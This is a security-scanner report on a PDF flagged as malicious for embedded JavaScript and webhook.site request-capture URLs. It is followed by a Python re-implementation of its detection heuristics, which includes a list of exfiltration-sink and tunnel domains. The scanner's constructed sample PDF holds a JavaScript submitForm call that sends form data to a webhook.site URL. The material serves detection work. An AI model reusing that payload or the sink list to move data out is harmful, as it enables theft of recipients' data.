Verdict: MALICIOUS
Risk Score: 88
Malware Insights
MITRE ATT&CK
- T1059.007 Command and Scripting Interpreter: JavaScript
- T1566.001 Phishing: Spearphishing Attachment
- T1041 Exfiltration Over C2 Channel
The PDF contains embedded JavaScript that attempts to send data to the webhook.site domain, a request-capture service that has no legitimate role as the destination of a document link. This behavior is indicative of data exfiltration, or of testing an exfiltration channel before use. The ML classifier also flagged the PDF as malicious (score 0.9999), supporting the assessment of malicious intent. Note that the per-URL labels below attribute both webhook.site URLs to the document body text, so the exact outbound call should be confirmed from the extracted /JS stream before relying on the exfiltration detail in reporting.
Machine Learning
- Nyx PDF Classifier malicious score 0.9999
Heuristics (4)

- PDF links to a request-capture / data-exfiltration sink [high] PDF_EXFIL_SINK_URL
  The PDF has a clickable HTTP(S) action whose destination is a request-capture / exfiltration endpoint (webhook.site, requestbin, beeceptor, pipedream, interactsh/OAST, burpcollaborator, canarytokens) or a throwaway tunnel (ngrok, trycloudflare). These services exist to receive arbitrary inbound requests, so they are essentially never a legitimate destination for a document link: the file is exfiltrating recipient/credential data or staging C2.

- JavaScript action [low] PDF_JAVASCRIPT (1 related finding)
  The PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

- Embedded JS stream [low] PDF_JS
  The PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

- Embedded URL [info] EMBEDDED_URL
  One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URLs:
  - https://webhook.site/f485c6c9-2587-4d66-b258-4cd52e1d244a (in PDF document text)
  - https://webhook.site/ (in PDF document text)
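The four heuristics above, re-implemented as a minimal scanner so the logic behind the PDF_EXFIL_SINK_URL and EMBEDDED_URL findings is visible. This is an added example, not the analyzer's own code. It reads raw PDF bytes, labels every extracted URL with the channel that reached it (link annotation, JS, document body), and flags destinations on request-capture or throwaway-tunnel hosts. Assumptions: the SINK_DOMAINS and TUNNEL_DOMAINS lists are inferred from the service names in the rule text, only literal-string values and uncompressed content streams are parsed, and SAMPLE_PDF is a constructed file rather than the one analyzed here.

```python
"""Minimal re-implementation of the four heuristics in this report (added example;
not the analyzer's own code). Scans raw PDF bytes, labels each extracted URL with
the channel that reached it, and flags request-capture / tunnel destinations.
Assumptions: the domain lists are inferred from the service names in the rule
text; only literal-string values and uncompressed content streams are parsed."""
from __future__ import annotations

import re
from urllib.parse import urlparse

# Assumed domain list for the services named by PDF_EXFIL_SINK_URL: hosts whose
# only purpose is to receive arbitrary inbound requests.
SINK_DOMAINS = ("webhook.site", "requestbin.com", "beeceptor.com", "pipedream.net",
                "interact.sh", "oast.fun", "oast.pro", "oast.live",
                "burpcollaborator.net", "canarytokens.com")
# Assumed domain list for the throwaway tunnels named by the same rule.
TUNNEL_DOMAINS = ("ngrok.io", "ngrok-free.app", "trycloudflare.com")

URL_RE = re.compile(rb"https?://[^\s\"'<>()\[\]]+")


def read_literal(data: bytes, pos: int) -> bytes:
    """Body of the PDF literal string starting at data[pos] == b'('.
    Tracks nested parentheses and backslash escapes, so JavaScript such as
    submitForm({...}) inside a /JS string is not cut off at its first ')'."""
    depth, out, i = 0, bytearray(), pos
    while i < len(data):
        c = data[i:i + 1]
        if c == b"\\":                       # escaped byte: keep it verbatim
            out += data[i + 1:i + 2]
            i += 2
            continue
        if c == b"(":
            depth += 1
            if depth > 1:
                out += c
        elif c == b")":
            depth -= 1
            if depth == 0:
                return bytes(out)
            out += c
        else:
            out += c
        i += 1
    return bytes(out)                        # unterminated string: best effort


def extract_urls(pdf: bytes) -> list[tuple[str, str]]:
    """(channel, url) pairs using the report's channel labels: 'link annotation'
    for /URI actions, 'JS' for /JS literals, 'document body' for content streams."""
    found: set[tuple[str, str]] = set()
    for key, channel in ((rb"/URI", "link annotation"), (rb"/JS", "JS")):
        # Direct literal values only; indirect refs (/JS 7 0 R) and hex strings are skipped.
        for m in re.finditer(key + rb"\s*(?=\()", pdf):
            for u in URL_RE.findall(read_literal(pdf, m.end())):
                found.add((channel, u.decode("latin-1")))
    # Uncompressed streams only; a /FlateDecode stream would need zlib.decompress first.
    for m in re.finditer(rb"stream\r?\n(.*?)endstream", pdf, re.S):
        for u in URL_RE.findall(m.group(1)):
            found.add(("document body", u.decode("latin-1")))
    return sorted(found)


def classify_host(url: str) -> str | None:
    """'sink', 'tunnel' or None; a host matches a listed domain or any subdomain of it."""
    host = (urlparse(url).hostname or "").lower()

    def under(domains: tuple[str, ...]) -> bool:
        return any(host == d or host.endswith("." + d) for d in domains)

    if under(SINK_DOMAINS):
        return "sink"
    if under(TUNNEL_DOMAINS):
        return "tunnel"
    return None


def analyze(pdf: bytes) -> dict:
    """Return {'findings': [(rule, severity, url-or-None)], 'urls': [(channel, url)]}."""
    urls = extract_urls(pdf)
    findings = []
    for channel, url in urls:
        # The rule fires on clickable actions; a sink reached only from JS or body
        # text is still visible in the urls table for the analyst.
        if channel == "link annotation" and classify_host(url):
            findings.append(("PDF_EXFIL_SINK_URL", "high", url))
    if b"/JavaScript" in pdf:
        findings.append(("PDF_JAVASCRIPT", "low", None))
    if re.search(rb"/JS\b", pdf):
        findings.append(("PDF_JS", "low", None))
    if urls:
        findings.append(("EMBEDDED_URL", "info", None))
    return {"findings": findings, "urls": urls}


# Constructed sample, not the analyzed file: one page with a clickable link, a
# document-level JavaScript action and visible text that all reference webhook.site.
SINK = "https://webhook.site/f485c6c9-2587-4d66-b258-4cd52e1d244a"
SAMPLE_PDF = f"""%PDF-1.7
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 5 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /Annots [4 0 R] /Contents 6 0 R >> endobj
4 0 obj << /Type /Annot /Subtype /Link /Rect [50 50 300 70]
   /A << /S /URI /URI ({SINK}) >> >> endobj
5 0 obj << /S /JavaScript
   /JS (this.submitForm({{cURL: "{SINK}", cSubmitAs: "HTML"}});) >> endobj
6 0 obj << /Length 116 >> stream
BT /F1 12 Tf (See {SINK}) Tj (https://example.com/invoice) Tj ET
endstream
endobj
trailer << /Root 1 0 R >>
%%EOF
""".encode("latin-1")

if __name__ == "__main__":
    result = analyze(SAMPLE_PDF)
    for item in result["findings"]:
        print(*item)
    for channel, url in result["urls"]:
        print(f"{url}  [{channel}]")
```

Run against SAMPLE_PDF it reports PDF_EXFIL_SINK_URL for the link annotation, the two low-severity JavaScript rules, and an EMBEDDED_URL entry listing the webhook.site URL under all three channels beside the benign example.com URL in the body text. The literal-string reader matters in practice: a naive `/JS \(([^)]*)\)` regex stops at the first `)` inside `submitForm({...})` and silently loses the URL that the JavaScript channel reaches.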